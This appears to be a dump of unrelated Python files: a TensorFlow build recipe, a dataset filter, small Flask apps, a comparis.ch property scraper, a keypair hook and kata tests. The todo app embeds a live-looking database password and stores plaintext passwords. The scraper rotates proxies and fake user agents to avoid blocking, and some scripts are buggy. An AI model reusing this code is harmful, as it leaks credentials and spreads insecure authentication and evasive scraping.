for f in ['tensorflow/workspace.bzl','tensorflow/contrib/makefile/download_dependencies.sh']:
filter_file('@EIGEN_SOURCE@', env['EIGEN_SOURCE'],f)
filter_file('@EIGEN_STRIP_PREFIX@', env['EIGEN_STRIP_PREFIX'],f)
filter_file('@PROTOBUF_SOURCE@', env['PROTOBUF_SOURCE'],f)
filter_file('@PROTOBUF_STRIP_PREFIX@', env['PROTOBUF_STRIP_PREFIX'], f)
bazel=which('bazel')
bazel('fetch', 'tensorflow:libtensorflow_cc.so')
for f in find(self.stage.path,'base/external/org_tensorflow/tensorflow/tensorflow.bzl'):
filter_file('executable=ctx.executable._swig,','env=ctx.configuration.default_shell_env, executable=ctx.executable._swig,',f)
for f in find(self.stage.path, 'base/external/protobuf_archive/protobuf.bzl'):
filter_file('mnemonic="ProtoCompile",','env=ctx.configuration.default_shell_env, mnemonic="ProtoCompile",', f)
for f in find(self.stage.path,'base/external/protobuf/BUILD'):
filter_file('"-lpthread", "-lm"','"-lpthread", "-lm", "-lrt"', f)
bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
'//tensorflow:libtensorflow_cc.so')
bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
'//tensorflow/tools/pip_package:build_pip_package')
bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
'//tensorflow/tools/lib_package:libtensorflow')
bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
'//tensorflow/python/tools:tools_pip')
bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
'//tensorflow/tools/graph_transforms:transform_graph')
bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
'//tensorflow/compiler/aot:tf_aot_runtime')
bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
'//tensorflow/compiler/tf2xla:xla_compiled_cpu_function')
bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
'//tensorflow/compiler/aot:tfcompile')
bazel('shutdown')
build_pip_package=Executable('bazel-bin/tensorflow/tools/pip_package/build_pip_package')
build_pip_package('.')
libdir='%s/tensorflow_cc/lib' % os.getcwd()
bindir='%s/tensorflow_cc/bin' % os.getcwd()
incdir='%s/tensorflow_cc/include' % os.getcwd()
mkdirp(libdir)
mkdirp(bindir)
mkdirp(incdir)
for f in find('bazel-bin/tensorflow/','libtensorflow_cc.so'):
if os.path.isfile(f) and not os.path.islink(f):
install(f, libdir)
for f in find('bazel-bin/tensorflow/','libtensorflow_framework.so'):
if os.path.isfile(f) and not os.path.islink(f):
install(f, libdir)
for f in find('bazel-bin/tensorflow/compiler/aot','libtf_aot_runtime.so'):
if os.path.isfile(f) and not os.path.islink(f):
install(f, libdir)
for f in find('bazel-bin/tensorflow/compiler/tf2xla', 'libxla_compiled_cpu_function.so'):
if os.path.isfile(f) and not os.path.islink(f):
install(f, libdir)
for f in find('bazel-bin/tensorflow/compiler/aot','tfcompile'):
if os.path.isfile(f) and not os.path.islink(f):
install(f, bindir)
depdl=Executable('tensorflow/contrib/makefile/download_dependencies.sh')
depdl()
for d in ('tensorflow','third_party'):
for f in find( d, '*.h'):
relinstall(f, incdir)
for f in find('third_party/eigen3','*'):
relinstall(f, incdir)
with working_dir('./bazel-genfiles'):
for f in find('tensorflow','*.h'):
if str(f).find('contrib') == -1:
relinstall(f, incdir)
with working_dir('./tensorflow/contrib/makefile/downloads'):
for d in ('gemmlowp', 'googletest', 're2', 'nsync/public'):
for f in find( d,'*.h'):
relinstall(f, incdir)
for d in ('eigen/Eigen', 'eigen/unsupported'):
for f in find( d,'*'):
relinstall(f, incdir)
f='eigen/signature_of_eigen3_matrix_library'
if os.path.exists(f):
relinstall(f, incdir)
tar=tarfile.open('bazel-bin/tensorflow/tools/lib_package/libtensorflow.tar.gz')
tar.extractall('tensorflow_cc')
install_tree(incdir, prefix.include)
install_tree(libdir, prefix.lib)
install_tree(bindir, prefix.bin)
pip=which('pip')
for f in find('.', 'tensorflow*.whl'):
pip('install', '--user', '-v', f)
|
# This script select the subjects and returns the datframe of the selected participants based on certain criterias:
import pandas as pd
import numpy as np
from os.path import join as opj
def extract(phenotype_file_path, base_directory, criteria_dict):
df_phenotype = pd.read_csv(phenotype_file_path)
# df_phenotype = df_phenotype.sort_values(['SUB_ID'])
# df_healthy = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
# & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
#
# df_diseased = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DSM_IV_TR'] == 1) \
# & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
log_path = opj(base_directory,"log.txt")
log = open(log_path, 'a')
log.write("------------- Extracted the subjects using the following criterias -------------\n")
for criteria, value in criteria_dict.items():
df = df_phenotype.loc[(df_phenotype[criteria] == value)]
df_phenotype = df
log.write('%s == %s \n'%(criteria, value))
log.flush()
return df_phenotype
def extract_with_manual_query(phenotype_file_path, base_directory):
df_phenotype = pd.read_csv(phenotype_file_path)
df_phenotype = df_phenotype.sort_values(['SUB_ID'])
df_healthy = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
& (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
df_diseased = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DSM_IV_TR'] == 1) \
& (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
log_path = opj(base_directory,"log.txt")
log = open(log_path, 'a')
log.write("------------- Extracted the subjects using the following criterias -------------\n")
log.write("df_healthy = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
& (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]\n")
log.flush()
return df_healthy , df_diseased
if __name__ == "__main__":
phenotype_file_path = '/home1/varunk/data/ABIDE1/RawDataBIDs/composite_phenotypic_file.csv'
base_directory = ''
criteria_dict = {'SEX' : 1,'DX_GROUP' : 2, 'EYE_STATUS_AT_SCAN' : 1}
df_healthy = extract(phenotype_file_path, base_directory, criteria_dict)
print(df_healthy)
df_healthy.to_csv('healthy.csv')
df_healthy, hf_diseased = extract_with_manual_query(phenotype_file_path, base_directory)
df.to_csv('healthy2.csv')
|
from flask import Flask
import requests
app = Flask(__name__)
countOfLikes = 0
countOfDislikes = 0
@app.route("/")
def index():
global countOfLikes
global countOfDislikes
answer = "Количество ❤: " + str(countOfLikes) + '<br>' + 'Количество 💔: ' + str(countOfDislikes)
return answer
@app.route("/like")
def like():
global countOfLikes
countOfLikes += 1
answer = "like"
return answer
@app.route("/dislike")
def dislike():
global countOfDislikes
countOfDislikes += 1
answer = "dislike"
return answer
@app.route("/mark")
def helloMark():
return "Hello Mark!"
@app.route("/joke")
def getJoke():
jokeRequest = requests.get("https://api.chucknorris.io/jokes/random")
answerJson = jokeRequest.json()
return "<img src=\"" + answerJson['icon_url'] + "\" ><p>" + answerJson['value'] + "</p>"
if __name__ == "__main__":
app.run(host='192.168.1.178', port=4567) |
from selenium import webdriver
# chrome_path = r"C:\Users\Ruben\Documents\Python packages\chromedriver_win32\chromedriver.exe"
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.proxy import Proxy, ProxyType
from selenium.webdriver.firefox.options import Options
from bs4 import BeautifulSoup
from fake_useragent import UserAgent
import random
import requests
import traceback
import time
import re
import datetime
from scraper.functionScraper import *
from scraper.classListingObject import *
from scraper.classHelpClasses import *
from scraper.classDBOperations import *
# THIS CODE ITERATES THROUGH POSTAL CODES AND GETS URLS OF LISTINGS, STORES THEM IN A DATABASE
def scraper1():
pstlCodes = postalCodes(DBOperations("kezenihi_srmidb3"))
uncheckedPostal = True
while uncheckedPostal is True:
# GET POSTALCODE
postalCodesList = pstlCodes.getAllPostalCodes()
postalCodesList = random.sample(postalCodesList, 10)
pc = postalCodesList[0]
# ITERATE THROUGH POSTAL CODES
if (len(postalCodesList) == 0):
uncheckedPostal = False
else:
pstlCodes.markInProgress(1, postalCodesList)
for pc in postalCodesList:
try:
print("SCRAPING FOR POSTAL CODE:")
print(pc)
# GET PROXY LIST, NEEDED TO CHANGE PROXY FROM TIME TO TIME
proxies = get_proxies()
# GET FAKE BROWSER USER AGENTS, CHANGED TOGETHER WITH PROXY
ua = UserAgent()
headers = ua.random
# TEST PROXY
url = 'https://httpbin.org/ip'
proxyWorks = False
print("GETTING PROXY")
while proxyWorks is False:
global proxy
print("Request")
proxy = random.choice(proxies)
try:
print("TRY")
response = requests.get(url, proxies={"http": proxy, "https": proxy})
proxyWorks = True
print(response.json())
except:
# Most free proxies will often get connection errors. You will have retry the entire request using another proxy to work.
# We will just skip retries as its beyond the scope of this tutorial and we are only downloading a single url
print("Skipping. Connnection error")
# SET PROXY FOR BEAUTIFULSOUP
proxies = {
"http": proxy,
"https": proxy,
}
# SET PROXY FOR SELENIUM
proxy = Proxy({
'proxyType': ProxyType.MANUAL,
'httpProxy': proxy,
'ftpProxy': proxy,
'sslProxy': proxy,
'noProxy': '' # set this value as desired
})
# MAKE BROWSER HEADLESS
options = Options()
options.headless = True
# MAKE BROWSER HEADLESS
# chrome_options = webdriver.ChromeOptions()
# chrome_options.add_argument('--headless')
# chrome_options.add_argument('--proxy-server={}'.format(proxy))
# OPEN HEADLESS BROWSER WINDOW AND VISIT INITIAL SEARCH PAGE OF COMPARIS
driver = webdriver.Firefox(options=options, proxy=proxy, service_log_path='/dev/null')
driver.get("https://www.comparis.ch/immobilien/result")
# TYPE IN POSTAL CODE AND HIT ENTER
siteReached = False
try:
searchField = driver.find_element_by_id("SearchParams_LocationSearchString")
siteReached = True
except:
print("Site could not be reached")
if (siteReached is True):
searchField.send_keys(str(pc))
searchField.send_keys(Keys.ENTER)
# WAIT 5 SECONDS AND GET CURRENT URL
time.sleep(5)
initialUrl = driver.current_url
# FIND OUT HOW MANY PAGES THERE ARE
nrOfPages = None
try:
nrOfPages = int(driver.find_element_by_css_selector("ul.pagination li:nth-last-child(2) a").get_attribute("innerHTML"))
print("Number of Pages: "+str(nrOfPages))
except Exception as e:
print("No pages found")
print(e)
# IF NO PAGES ARE EXISTING ONLY SCRAPE THE URLS FROM THE INITIAL PAGE
if (nrOfPages is not None):
# PRESS PAGINATION NEXT BUTTON (NECESSARY TO GET THE SECOND PAGE URL, WHICH CAN BE USED TO GENERATE ALL REMAINING URLS)
nextButton = driver.find_element_by_css_selector('.pagination-next a')
nextButton.click()
# GET URL OF SECOND PAGE
time.sleep(5)
secondUrl = driver.current_url
# CREATE ALL REMAINING URLS
allUrls = [initialUrl, secondUrl]
plainUrl = re.sub('&page=1', '', secondUrl)
for i in range(2, nrOfPages):
allUrls.append(plainUrl+"&page="+str(i))
else:
allUrls = [initialUrl] # IF NO PAGINATION EXISTING
# CLOSE HEADLESS BROWSER WINDOW
driver.close()
driver.quit()
# GET URLS OF LISTINGS
urlListings = []
checkSuccess = False
# SET COUNTER FOR CONSOLE OUTPUT
counter = 1
# ITERATE THROUGH ALL URLS AND SCRAPE LISTING URLS FROM THERE
for i in allUrls:
# VISIT URL, GET SOURCE CODE
try:
page = None
print("Scrape listing URLs for Base URL: "+str(counter))
page = requests.get(i, proxies=proxies, headers={'user-agent': headers}, timeout=60).content # connect to website
except:
print("An error occured.")
# IF REQUEST WAS SUCCESSFUL SCRAPE THROUGH SOURCE CODE
if(page is not None):
soup = BeautifulSoup(page, 'html.parser')
d = datetime.datetime.today()
# SET VAR TO TRUE TO INDICATE THAT THIS POSTAL CODE CAN BE MARKED AS SCRAPED WITH A CURRENT DATE
checkSuccess = True
print("Check was successful")
# ITERATE THROUGH DIVS CONTAINING THE ADDRESS, POSTAL CODE AND URL
# WE SCRAPE THE POSTAL CODE INITIALLY HERE, BECAUSE IT CAN BE EASIER DISTINGUISHED BETWEEN STREET AND POSTAL CODE
for a in soup.select('div.content-column.columns'):
if (len(a.select('a.title')) > 0):
url = a.select('a.title')[0]['href']
print("--> Found URL: "+url)
if (len(a.select('span.street')) > 0):
street = a.select('span.street')[0].string
else:
street = 0
if (len(a.select('address')) > 0):
postal = str(a.select('address')[0].text).strip()
postal = re.findall("\d{4}", postal)
postal = postal[0]
else:
postal = 0
# APPEND FOUND URLS TO LIST UF URLS
urlListings.append(("https://en.comparis.ch"+url, street, postal, 0, d.strftime('%Y-%m-%d'), 0))
counter = counter+1
print("Appended, length of URL list: "+str(len(urlListings)))
# CHECK WHETHER URLS ARE IN UrlList already
checkedUrls = UrlList(DBOperations("kezenihi_srmidb3"))
allCheckedUrls = checkedUrls.getAllUrls()
# REMOVE DOUBE ENTRIES
validUrls = [x for x in urlListings if x[0] not in allCheckedUrls]
# IF VALID URLS ARE REMAINING, INSERT THEM INTO listingURL
if (len(validUrls) > 0):
# INSERT NEW URLS INTO listingURL
print("Update listingURL table")
checkedUrls.insertNewUrls(validUrls)
else:
print("No new URLS added")
# UPDATE postalCodes TABLE WITH NEW DATE
if (checkSuccess is True):
print("Update postalCodes table")
d = datetime.datetime.today()
postalCodes.updateLastChecked(postalCode=pc, date=d.strftime('%Y-%m-%d'))
print("\n\n")
except Exception as e:
print("THIS POSTAL CODE DID NOT RUN THROUGH")
print(traceback.format_exc())
print(e)
print("\n\n")
pstlCodes.markInProgress(0, postalCodesList)
|
"""Wrapper for keypair hook adding support for values from environment."""
import logging
from stacker.lookups.handlers.default import handler as default_handler
from stacker.lookups.handlers.output import handler as output_handler
import stacker.hooks.keypair as keypair
LOGGER = logging.getLogger(__name__)
def ensure_keypair_exists(provider, context, **kwargs):
"""Wrap ensure_keypair_exists with support for environment values."""
if kwargs.get('keypair'):
# keypair has been explicitly set; nothing to do here
return keypair.ensure_keypair_exists(context=context,
provider=provider,
**kwargs)
elif kwargs.get('keypair_from_output_handler'):
keypair_name = output_handler(
kwargs.get('keypair_from_output_handler'),
provider=provider,
context=context
)
return keypair.ensure_keypair_exists(context=context,
provider=provider,
keypair=keypair_name)
elif kwargs.get('keypair_name_from_default_handler'):
if '::' not in kwargs.get('keypair_name_from_default_handler'):
LOGGER.error('Invalid value provided for '
'keypair_name_from_default_handler - need value in '
'the form of "env_var::fallback", received "%s".',
kwargs.get('keypair_name_from_default_handler'))
return False
keypair_name = default_handler(
kwargs.get('keypair_name_from_default_handler'),
provider=provider,
context=context
)
if keypair_name in [None, '', '\'', '\'\'', 'undefined']:
LOGGER.info(
'Skipping keypair creation; default handler found no '
'environment value matching "%s"...',
kwargs.get('keypair_name_from_default_handler').split('::')[0])
return True
return keypair.ensure_keypair_exists(context=context,
provider=provider,
keypair=keypair_name)
else:
kwargs_string = ', '.join(
"%s=%r" % (key, val) for (key, val) in kwargs.iteritems()
)
LOGGER.error('No valid argument provided to ensure_keypair_exists ('
'looking for one of keypair, keypair_from_output, or '
'keypair_from_default - received "%s")',
kwargs_string)
return False
|
from flask import Flask,render_template, jsonify,make_response,redirect
from flask.globals import request
from flask import abort
from flask_pymongo import PyMongo
from bson.json_util import dumps
import pymongo
import datetime as dt
app = Flask(__name__)
app.config['MONGO_DBNAME']='my_todo_list'
app.config['MONGO_URI']="mongodb://awais:awais64@ds121652.mlab.com:21652/my_todo_list"
mongo = PyMongo(app)
c = pymongo.MongoClient()
#Global Var
login = False
loginCred = []
'''
Signup
'''
@app.route('/todo/signup',methods=['POST'])
def Signup():
users = mongo.db.users
if not request.json:
abort(404)
content = request.get_json()
auth = {
"id":users.count()+1,
"name":content.get('name'),
"username": content.get('username'),
"password": content.get('password')
}
if users.find({"username":auth["username"]})==None:
users.insert(auth)
return auth['name']+" is Successfully Added"
else:
return "already exist"
#all = dumps(users.find({"username":auth["username"]}))
#return jsonify({"a":all})
'''
@app.route('/todo/api/v1.0/tasks/<int:task_id>')
def get_by_value(task_id):
task = [task for task in tasks if task['id']==task_id]
if len(task)==0:
abort(404)
return jsonify({'tasks':task})
'''
@app.route('/todo/login',methods=['POST'])
def Login():
loginCred=[]
login = False
users = mongo.db.users
if not request.json:
abort(404)
content = request.get_json()
auth = {
"username": content.get('username'),
"password": content.get('password')
}
#all = dumps(users.find({"username":auth["username"],"password":auth["password"]}))
rec = users.find({"username":auth["username"],"password":auth["password"]})
if rec==[] or rec=={} or not rec:
return "username or password not correct"
else:
login = True
loginCred.append([{'id':i['id'],'username':i['username'],'password':i['password'],'name':i['name']} for i in rec])
return jsonify({'users':loginCred})
#return users.find({"username":auth["username"],"password":auth["password"]}).get('username')
#return jsonify({'Users':all}),201
@app.route('/todo/api/v1.0/tasks',methods=['POST'])
def addtask():
'''if login == False:
return "Login to add task"'''
num = 1
todo = mongo.db.todo
if not request.json:
abort(404)
content = request.get_json()
cou = sum([1 for i in todo.find({'userid':num})])
send = {
"taskid": cou+1,
"userid": num,
"title": content.get('title'),
"note": content.get('note'),
"setdate": dt.datetime.now(),
"duedate": content.get('duedate'),
"done": False
}
todo.insert(send),201
d = []
d.append([{"taskid":i['taskid'],"userid": num,"title": i['title'],"note":i["note"],"setdate":i["setdate"],"duedate": i['duedate']} for i in todo.find({'userid':num})])
return jsonify(d)
@app.route('/todo/api/v1.0/tasks')
def getAllTask():
num = 1
todo = mongo.db.todo
d = []
d.append([{"taskid":i['taskid'],"userid": num,"title": i['title'],"note":i["note"],"setdate":i["setdate"],"duedate": i['duedate']} for i in todo.find({'userid':num})])
return jsonify(d)
@app.route('/todo/api/v1.0/tasks/<int:tsk>')
def oneTask(tsk):
num = 1
todo = mongo.db.todo
d = []
d.append([{"taskid":i['taskid'],"userid": num,"title": i['title'],"note":i["note"],"setdate":i["setdate"],"duedate": i['duedate']} for i in todo.find({'userid':num})if i['taskid']==tsk])
return jsonify(d)
@app.route('/todo/api/v1.0/tasks/<int:tsk>',methods=['PUT'])
def upadteTask(tsk):
num = 1
todo = mongo.db.todo
if not request.json:
abort(404)
content = request.get_json()
todo.update({'userid':num,'taskid':tsk},{'$set':content})
return "Successfully Updated"
@app.route('/todo/api/v1.0/tasks/<int:tsk>',methods=['DELETE'])
def delete(tsk):
num = 1
todo = mongo.db.todo
if not request.json:
abort(404)
content = request.get_json()
todo.delete_one({'userid':num,'taskid':tsk})
return "Successfully Deleted"
app.run(debug=True) |
import unittest
from katas.kyu_7.strive_matching_2 import match
class StriveMatchingTestCase(unittest.TestCase):
def setUp(self):
self.candidates = [{
'desires_equity': True,
'current_location': 'New York',
'desired_locations': ['San Francisco', 'Los Angeles']
}, {
'desires_equity': False,
'current_location': 'San Francisco',
'desired_locations': ['Kentucky', 'New Mexico']
}]
def test_equals(self):
self.assertEqual(len(match({
'equity_max': 0, 'locations': ['Los Angeles', 'New York']},
self.candidates)), 0)
def test_equals_2(self):
self.assertEqual(len(match({
'equity_max': 1.2, 'locations': ['New York', 'Kentucky']},
self.candidates)), 2)
|
#This code takes a string and stores it in a hash table:
#s='ABCDE'
#While storing elements in a hash table,the time complexity is O(n),
#but while accessing the elements,the complexity is O(1)
def is_String_Unique(s):
list_of_chars = list(s)
length_of_string = len(list_of_chars)
table_size=length_of_string
sum=0
#Implement the Hash Table
hash_table=[None]*150
flag=0
for i in range(len(s)):
if(hash_table[ord(s[i])]==s[i]):
print 'Duplicate Characters !'
flag=1
break
else:
hash_table[ord(s[i])]=s[i]
if(flag==0):
print "No Duplicate Characters"
is_String_Unique('ABCDFFA')
|
from cuatro.dice import Dice
from cuatro.fields import *
def test_one():
d = Dice()
one = One()
d._update([2, 2, 2, 3, 4])
assert one.fits(d) == False
d._update([1, 2, 2, 3, 4])
assert one.fits(d) == False
d._update([1, 1, 2, 3, 4])
assert one.fits(d) == True
d._update([1, 1, 1, 3, 4])
assert one.fits(d) == True
d._update([1, 1, 1, 1, 4])
assert one.fits(d) == True
d._update([1, 1, 1, 1, 1])
assert one.fits(d) == True
def test_straight():
d = Dice()
straight = Straight()
d._update([1, 2, 3, 4, 4])
assert straight.fits(d) == False
d._update([1, 2, 3, 4, 5])
assert straight.fits(d) == True
d._update([6, 2, 3, 4, 5])
assert straight.fits(d) == True
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.